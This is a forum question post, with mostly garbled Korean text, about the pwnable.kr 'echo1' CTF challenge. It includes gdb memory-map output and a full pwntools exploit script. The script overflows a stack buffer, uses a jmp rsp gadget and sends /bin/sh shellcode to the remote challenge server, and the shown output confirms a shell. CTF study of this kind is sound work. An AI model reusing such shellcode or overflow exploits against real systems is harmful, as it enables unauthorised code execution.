http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=2011 [º¹»ç]
ÀÌÀü±Û http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=2000
ÀÌÀü¿¡ echo1 Ç®À̸¦ ºÁµµ ÀÌÇØ°¡ ¾È°¡¼ Áú¹®±ÛÀ» ¿Ã·È¾ú´Âµ¥, ÇØ°áÀÌ ¾ÈµÅ¼ ´ÙÀ½¿¡ º¸°Ú´Ù°íÇÏ°í ³Ñ¾î°¬½À´Ï´Ù.
À̹ø¿¡ echo1 ¹®Á¦¸¦ ´Ù½Ãº¸´Âµ¥ ¿©ÀüÈ÷ ÀÌÇØ°¡ °¡Áö ¾Ê½À´Ï´Ù.
ºÐ¸íÈ÷ echo1¿¡¼ ¿À¹öÇ÷ΰ¡ ¹ß»ýÇÏ°í, NX°¡ Àû¿ëµÇ¾îÀÖÁö ¾Ê¾Æ ½©Äڵ带 ½ÇÇà½ÃÅ°´Â ¹®Á¦·Î º¸ÀÔ´Ï´Ù. ±×·±µ¥ ¾î¶»°Ô ½ÇÇàÀ» ½Ãų°ÍÀΰ¡°¡ °ü°ÇÀε¥, Ç®À̸¦ º¸´Ï id ¿µ¿ª¿¡ jmp rspÀÇ opcode(\xff\xe4)¸¦ ÀúÀåÇÏ°í ÀÌ°É ½ÇÇà½ÃÅ°´õ¶ó±¸¿ä. (rsp´Â ½©Äڵ带 °¡¸®Å°°íÀÖ½À´Ï´Ù.)
¹®Á¦´Â id ¿µ¿ª¿¡´Â ½ÇÇà±ÇÇÑÀÌ ¾ø¾î¼ opcode¸¦ ÀúÀåÇصµ ½ÇÇàÇÒ¼ö°¡ ¾ø½À´Ï´Ù.
±×·¡¼ rip¸¦ id·Î Á¶ÀýÇÑ´Ù°íÇصµ, ½ÇÇàÇÏ·Á°íÇϸé SIGSEGV°¡ ¹ß»ýÇÕ´Ï´Ù. ·ÎÄÿ¡¼´Â¿ä.
±Ùµ¥ ¸®¸ðÆ®·ÎÇϸé Àß µË´Ï´Ù? Á» È¥¶õ½º·¯¿îµ¥ ¹» ³õÄ¡°íÀִ°ɱî¿ä..
[µð¹ö±ë Á¤º¸]
(gdb) info proc
process 165283
cmdline = '/home/ubuntu/ctf/echo1'
cwd = '/home/ubuntu/ctf'
exe = '/home/ubuntu/ctf/echo1'
(gdb) !cat /proc/165283/maps
00400000-00401000 r-xp 00000000 ca:01 785621 /home/ubuntu/ctf/echo1
00601000-00602000 r--p 00001000 ca:01 785621 /home/ubuntu/ctf/echo1
00602000-00603000 rw-p 00002000 ca:01 785621 /home/ubuntu/ctf/echo1 // ¿©±â´Â ½ÇÇà±ÇÇÑÀÌ ¾øÀ½.
(»ý·«)
7ffffffde000-7ffffffff000 rwxp 00000000 00:00 0 [stack] // ¿©±â´Â ½ÇÇà±ÇÇÑÀÌ ÀÖÀ½
(»ý·«)
(gdb) p &id
$2 = (<data variable, no debug info> *) 0x6020a0 <id>
[Àͽº ÄÚµå]
from pwn import *
#e = ELF("./echo1")
jmp_rsp = b"\xff\xe4"
sc = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
p = remote("pwnable.kr", 9010)
#p = process("./echo1")
name = jmp_rsp
name_addr = 0x6020a0
p.sendline(name)
print(p.recvuntil(b"> "))
p.sendline(b"1") # 1. BOF
payload = b"a"*0x20 + b"b"*0x8 # buf + rbp
payload += p64(name_addr) # ret
payload += sc
p.sendline(payload)
p.interactive()
[½ÇÇà °á°ú]
$ python echo1.py
[+] Opening connection to pwnable.kr on port 9010: Done
b"hey, what's your name? : \n- select echo type -\n- 1. : BOF echo\n- 2. : FSB echo\n- 3. : UAF echo\n- 4. : exit\n> "
[*] Switching to interactive mode
hello \xff\xe4
$ aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbb\xa0 `
goodbye \xff\xe4
$ id
uid=1053(echo1) gid=1053(echo1) groups=1053(echo1) |
Hit : 1547 Date : 2022/10/05 12:21
|